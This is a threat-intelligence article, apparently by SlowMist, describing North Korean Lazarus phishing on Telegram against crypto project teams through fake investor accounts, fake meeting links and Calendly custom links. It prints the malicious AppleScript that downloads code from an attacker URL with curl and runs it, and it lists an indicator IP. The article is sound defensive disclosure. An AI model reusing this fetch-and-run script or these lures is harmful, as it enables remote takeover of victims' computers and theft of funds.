
SlowMist: Analysis of North Korean Hackers' Targeted Fraud Attacks on Telegram
TechFlow Selected TechFlow Selected

SlowMist: Analysis of North Korean Hackers' Targeted Fraud Attacks on Telegram
North Korean hackers have begun impersonating well-known investment firms to conduct phishing scams targeting project teams, with a broad impact.
Author: 23pds@SlowMist Security Team
Background
As early as 2022, the SlowMist security team discovered through its SlowMist BTI intelligence network that the North Korean hacking group Lazarus had initiated large-scale Telegram phishing campaigns targeting the cryptocurrency industry. Recently, these hackers have begun impersonating well-known investment firms to conduct phishing attacks against project teams. Given the broad impact, SlowMist provides the following analysis.

Tactics
1. Select prominent venture capital firms to impersonate and create fake Telegram accounts:

2. Identify well-known DeFi projects as targets and use the fake accounts to initiate scams under the pretense of making investments:

The North Korean hackers first initiate contact via chat to establish communication. If the project team responds and lacks sufficient security awareness, the scenario depicted below may occur:


After gaining the trust of the project team, the hackers proceed to schedule a meeting. There are two primary attack methods used at this stage:
1. Invite the target to join a meeting hosted on domains such as ***.group-meeting.team, pretending to check availability for discussion and proactively providing a malicious meeting link. Once clicked, the victim encounters a regional access restriction notice. The hacker then persuades the victim to download and run a malicious script designed to "spoof location." Executing this script grants the North Korean hackers full control over the victim's computer, leading to potential fund theft. Below is the content of the malicious script IP_Request.scpt:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &""\""
run script sc
Code Explanation:

2. Exploit Calendly’s meeting scheduling system by using the “Add Custom Link” feature to embed malicious links within event pages. Since Calendly integrates seamlessly into most project teams’ daily workflows, these malicious links often go unnoticed. Victims may inadvertently click them, downloading and executing malicious code, thereby granting the hackers access to system information or privileges.

On November 30, 2023, the SlowMist security team also issued an alert regarding similar attack methods:

Basic IOCs:
IP: 104.168.137.21
Domains:

Malicious attack examples:


Summary
Given that such fraudulent activities continue to occur, Web3 users are strongly advised to verify the authenticity of contacts through dual-channel confirmation before adding friends. Additionally, enable two-factor authentication (2FA) on Telegram and remain vigilant about transaction security to avoid financial losses.
If you accidentally execute any malware, immediately transfer your funds, disconnect from the internet, run antivirus software, and change passwords for all relevant accounts—including those saved in your browser—on the affected device.
Join TechFlow official community to stay tuned
Telegram:https://t.me/TechFlowDaily
X (Twitter):https://x.com/TechFlowPost
X (Twitter) EN:https://x.com/BlockFlow_News














